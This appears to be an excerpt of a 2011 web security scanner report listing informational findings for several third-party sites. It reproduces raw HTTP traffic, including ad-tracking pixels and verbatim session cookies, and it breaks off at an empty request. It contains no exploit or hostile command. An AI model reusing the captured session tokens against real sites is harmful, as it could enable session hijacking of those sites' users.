Set-Cookie: cmp=1_1303744437_10164:0_10638:0_10640:0_10641:0_1437:0_1660:564765; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: uid=1_1303744437_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: kwd=1_1303744437_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: sit=1_1303744437_719:0:0_2451:52865:47765_3236:210828:210710_782:565114:564765; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: cre=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: bpd=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: apd=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: scg=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: ppd=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Set-Cookie: afl=1_1303744437; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:13:58 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 15:13:58 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
<![endif]>

<!-- matched campaign #10164 is eligible -->
<!-- matched campaign #10638 is eligible -->
<!-- matched campaign #10640 is eligible -->
<!-- matched campaign #10641 is eligible -->
<img width=1 height=1 border=0 src="http://ad.trafficmp.com/a/bpix?adv=652&id=1005&r=">
<!-- "Net Suite" c/o "FetchBack", segment: 'Net Suite Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js"></script>
<!-- End of pixel tag -->
<!-- List Id = 34879 and List Name = CM_FB_169 -->
<!-- Begin ad tag -->
<script language= "JavaScript" type="text/javascript">
ord=Math.random()*10000000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord='+ ord +'?"width="1" height="1" border="0" alt="">');
</script>
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>
<!-- End ad tag -->
<img src="http://pixel.rubiconproject.com/tap.php?v=2939|1" border="0" width="1" height="1">
<!-- "NetSuite AU" c/o "FetchBack", segment: 'NetSuiteAU Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment" width="1" height="1" />
</noscript>
<!-- End of pixel tag -->
<!-- "NetSuite Singapore" c/o "FetchBack", segment: 'NetSuite Sing Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment&returnType=js"></script>
<noscript>
<img src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment" width="1" height="1" />
</noscript
...[SNIP]...

Request 2

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303696672_1660:517000; uid=1_1303696672_1303179323923:6792170478871670; kwd=1_1303696672; sit=1_1303696672_2451:5100:0_3236:163063:162945_782:517349:517000; cre=1_1303696672; bpd=1_1303696672; apd=1_1303696672; scg=1_1303696672; ppd=1_1303696672; afl=1_1303696672

Response 2

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:14:05 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303744445_1437:0_1660:564773; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: uid=1_1303744445_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: kwd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: sit=1_1303744445_719:0:0_2451:52873:47773_3236:210836:210718_782:565122:564773; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: cre=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: bpd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: apd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: scg=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: ppd=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Set-Cookie: afl=1_1303744445; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 15:14:05 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 15:14:05 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2488

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
<![endif]>

<img width=1 height=1 border=0 src="http://ad.trafficmp.com/a/bpix?adv=652&id=1005&r=">
<!-- "Net Suite" c/o "FetchBack", segment: 'Net Suite Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js"></script>
<!-- End of pixel tag -->
<!-- List Id = 34879 and List Name = CM_FB_169 -->
<!-- Begin ad tag -->
<script language= "JavaScript" type="text/javascript">
ord=Math.random()*10000000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord='+ ord +'?"width="1" height="1" border="0" alt="">');
</script>
<noscript>
<img src="http://ad.doubleclick.net/activity;src=1461286;dcnet=4155;boom=34879;sz=1x1;ord=1?"width="1" height="1" border="0" alt="">
</noscript>
<!-- End ad tag -->
<img src="http://pixel.rubiconproject.com/tap.php?v=2939|1" border="0" width="1" height="1">
<!-- Advertiser 'FetchBack (m)', Include user in segment 'retargeting - 242' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.bannerconnect.net/pixel?id=495608&t=2" width="1" height="1" />
<!-- End of segment tag -->
<img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1" width="1" height="1" border="0" >
<img src="http://ad.adtegrity.net/pixel?id=494024&t=2" width="1" height="1" />
<!-- Advertiser 'OpenX Limited', Include user in segment 'Fetchback_148' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<img src="http://ad.yieldmanager.com/pixel?id=478454&t=2" width="1" height="1" />
<!-- End of segment tag -->
<!-- List Id = 23534 and List Name = Net Suite Retargeting -->
<!-- Begin ad tag -->
<script language= "JavaScript" type="text/javascript">
ord=Math.random()*10000000000000000;
document.write('<img src="http://ad.doubleclick.net/activity;src=1801246;dcnet=4591;boom=23534;sz=1x1;ord='+ ord +'?"width="1" height="1" border="0" alt="">');
</script>
<noscript>
<img src
...[SNIP]...
21.2. http://solutions.kronos.com/content/experience2011  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://solutions.kronos.com
Path:   /content/experience2011

Request 1

GET /content/experience2011 HTTP/1.1
Host: solutions.kronos.com
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.9.10.1303738437; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:54:36 GMT
Content-Length: 15646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
<img src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=07f4199a-e2e3-4df4-8cd3-81c0c6bfdbf6&elq={00000000-0000-0000-0000-000000000000}&ref=http%3a%2f%2fwww.kronos.com%2f&elq_ck=0" border=0 width=1 height=1 ><\/layer>');
}else{
document.write('<img style="display:none" src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=07f4199a-e2e3-4df4-8cd3-81c0c6bfdbf6&elq={00000000-0000-0000-0000-000000000000}&ref=http%3a%2f%2fwww.kronos.com%2f&elq_ck=0" border=0 width=1 height=1 >');
}
-->
</script>

Request 2

GET /content/experience2011 HTTP/1.1
Host: solutions.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1303738433760-48782#1303742829|check#true#1303741029; s_cc=true; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.9.10.1303738437; s_nr=1303741346229; s_invisit=true; s_lv=1303741346233; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=kronos-dev%3D%2526pid%253Dkronos%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kronos.com%25252Fexperience2011%2526ot%253DA

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:55:26 GMT
Content-Length: 15576

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conten
...[SNIP]...
<img src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=5c7c78e8-9c2a-422e-971f-b2e7b77b3a37&elq={00000000-0000-0000-0000-000000000000}&elq_ck=0" border=0 width=1 height=1 ><\/layer>');
}else{
document.write('<img style="display:none" src="http://now.eloqua.com/visitor/v200/svrGP.aspx?pps=60&siteid=1763&PURLSiteID=1&PURLSiteAlternateDNSID=0&PURLContentWebPublishID=174&PURLRecordID=0&PURLGUID=5c7c78e8-9c2a-422e-971f-b2e7b77b3a37&elq={00000000-0000-0000-0000-000000000000}&elq_ck=0" border=0 width=1 height=1 >');
}
-->
</script>
21.3. https://support.trust-guard.com/index.php%253f_ca=css&group=default  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /index.php%253f_ca=css&group=default

Request 1

GET /index.php%253f_ca=css&group=default HTTP/1.1
Referer: https://support.trust-guard.com/themes/client_default/sendbuttonbg.gif)%3b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 300 Multiple Choices
Date: Mon, 25 Apr 2011 19:07:47 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Content-Type: text/html; charset=iso-8859-1
Content-Length: 613

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>300 Multiple Choices</TITLE>
</HEAD><BODY>
<H1>Multiple Choices</H1>
The document name you requested (<code>/index.php%3f_ca=css&
...[SNIP]...
</ul>
Please consider informing the owner of the <a href="https://support.trust-guard.com/themes/client_default/sendbuttonbg.gif)%253b">referring page</a> about the broken link.
</BODY></HTML>

Request 2

GET /index.php%253f_ca=css&group=default HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 300 Multiple Choices
Date: Mon, 25 Apr 2011 19:07:51 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Content-Type: text/html; charset=iso-8859-1
Content-Length: 441

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>300 Multiple Choices</TITLE>
</HEAD><BODY>
<H1>Multiple Choices</H1>
The document name you requested (<code>/index.php%3f_ca=css&
...[SNIP]...
</ul>
</BODY></HTML>
21.4. https://support.trust-guard.com/index.php%3f_ca=css&group=default  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /index.php%3f_ca=css&group=default

Request 1

GET /index.php%3f_ca=css&group=default HTTP/1.1
Referer: https://support.trust-guard.com/themes/client_default/sendbuttonbg.gif);
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 300 Multiple Choices
Date: Mon, 25 Apr 2011 19:06:31 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Content-Type: text/html; charset=iso-8859-1
Content-Length: 609

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>300 Multiple Choices</TITLE>
</HEAD><BODY>
<H1>Multiple Choices</H1>
The document name you requested (<code>/index.php?_ca=css&am
...[SNIP]...
</ul>
Please consider informing the owner of the <a href="https://support.trust-guard.com/themes/client_default/sendbuttonbg.gif)%3b">referring page</a> about the broken link.
</BODY></HTML>

Request 2

GET /index.php%3f_ca=css&group=default HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 300 Multiple Choices
Date: Mon, 25 Apr 2011 19:06:35 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Content-Type: text/html; charset=iso-8859-1
Content-Length: 439

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>300 Multiple Choices</TITLE>
</HEAD><BODY>
<H1>Multiple Choices</H1>
The document name you requested (<code>/index.php?_ca=css&am
...[SNIP]...
</ul>
</BODY></HTML>
21.5. https://support.trust-guard.com/themes/client_default/sendbuttonbg.gif)  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /themes/client_default/sendbuttonbg.gif)

Request 1

GET /themes/client_default/sendbuttonbg.gif); HTTP/1.1
Referer: https://support.trust-guard.com/index.php?_ca=css&group=default
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 300 Multiple Choices
Date: Mon, 25 Apr 2011 18:59:35 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Content-Type: text/html; charset=iso-8859-1
Content-Length: 663

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>300 Multiple Choices</TITLE>
</HEAD><BODY>
<H1>Multiple Choices</H1>
The document name you requested (<code>/themes/client_defaul
...[SNIP]...
</ul>
Please consider informing the owner of the <a href="https://support.trust-guard.com/index.php%3f_ca=css&group=default">referring page</a> about the broken link.
</BODY></HTML>

Request 2

GET /themes/client_default/sendbuttonbg.gif); HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A3%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=f49861fv13sl05grj1c1z7kmcn3wsand
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 300 Multiple Choices
Date: Mon, 25 Apr 2011 18:59:41 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Content-Type: text/html; charset=iso-8859-1
Content-Length: 502

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>300 Multiple Choices</TITLE>
</HEAD><BODY>
<H1>Multiple Choices</H1>
The document name you requested (<code>/themes/client_defaul
...[SNIP]...
</ul>
</BODY></HTML>
21.6. https://support.trust-guard.com/themes/client_default/sendbuttonbg.gif)%3b  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://support.trust-guard.com
Path:   /themes/client_default/sendbuttonbg.gif)%3b

Request 1

GET /themes/client_default/sendbuttonbg.gif)%3b HTTP/1.1
Referer: https://support.trust-guard.com/index.php%3f_ca=css&group=default
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response 1

HTTP/1.1 300 Multiple Choices
Date: Mon, 25 Apr 2011 19:06:53 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Content-Type: text/html; charset=iso-8859-1
Content-Length: 665

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>300 Multiple Choices</TITLE>
</HEAD><BODY>
<H1>Multiple Choices</H1>
The document name you requested (<code>/themes/client_defaul
...[SNIP]...
</ul>
Please consider informing the owner of the <a href="https://support.trust-guard.com/index.php%253f_ca=css&group=default">referring page</a> about the broken link.
</BODY></HTML>

Request 2

GET /themes/client_default/sendbuttonbg.gif)%3b HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: support.trust-guard.com
Cookie: SWIFT_sessionid40=8n54ogf9yeyrzjhmjwv9umkqinwempoj; SWIFT_client=a%3A2%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3Bs%3A10%3A%22languageid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D; SWIFT_sessionid80=36r5tssjo8ljsterx8m2rwi61oy09zq9
Accept-Encoding: gzip, deflate

Response 2

HTTP/1.1 300 Multiple Choices
Date: Mon, 25 Apr 2011 19:06:59 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Content-Type: text/html; charset=iso-8859-1
Content-Length: 502

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>300 Multiple Choices</TITLE>
</HEAD><BODY>
<H1>Multiple Choices</H1>
The document name you requested (<code>/themes/client_defaul
...[SNIP]...
</ul>
</BODY></HTML>
21.7. http://www.dmca.com/Protection/Status.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.dmca.com
Path:   /Protection/Status.aspx

Request 1

GET /Protection/Status.aspx?id=6d6905a9-aeec-4426-921a-33dc8d0cdfb9&PAGE_ID=aHR0cDovL3d3dy5yZXB1dGF0aW9uY2hhbmdlci5jb20vc2NoZWR1bGVkLmh0bWw1 HTTP/1.1
Host: www.dmca.com
Proxy-Connection: keep-alive
Referer: http://www.reputationchanger.com/scheduled.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wubflym5pb53bt45ku4n3oa4

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: whoson=521479-61577.4253039; expires=Thu, 23-Jun-2011 23:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:06:17 GMT
Content-Length: 14244


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<html xmlns="http://www.w3.org/1999/xhtml">

<head id="ctl00_mstrHead"><title>
   Reputation Changer | Protected by DMCA Protecti
...[SNIP]...
<br />Referer is: http://www.reputationchanger.com/scheduled.html
           <br />PageKey is:
           <br />Language is: en-US
           <br />Browser Language is:en-US
           -->
           <input type="hidden" name="ctl00$cntBody$hidPageKey" id="ctl00_cntBody_hidPageKey" value="aHR0cDovL3d3dy5yZXB1dGF0aW9uY2hhbmdlci5jb20vc2NoZWR1bGVkLmh0bWw1" />
           




</div>

</div>



<script type="text/javascript">
//<![CDATA[
var __wpmExportWarning='a';var __wpmCloseProviderWarning='c';var __wpmDeleteWarning='b';Sys.Application.initialize();
//]]>
</script>
</form>

</body>
</html>

Request 2

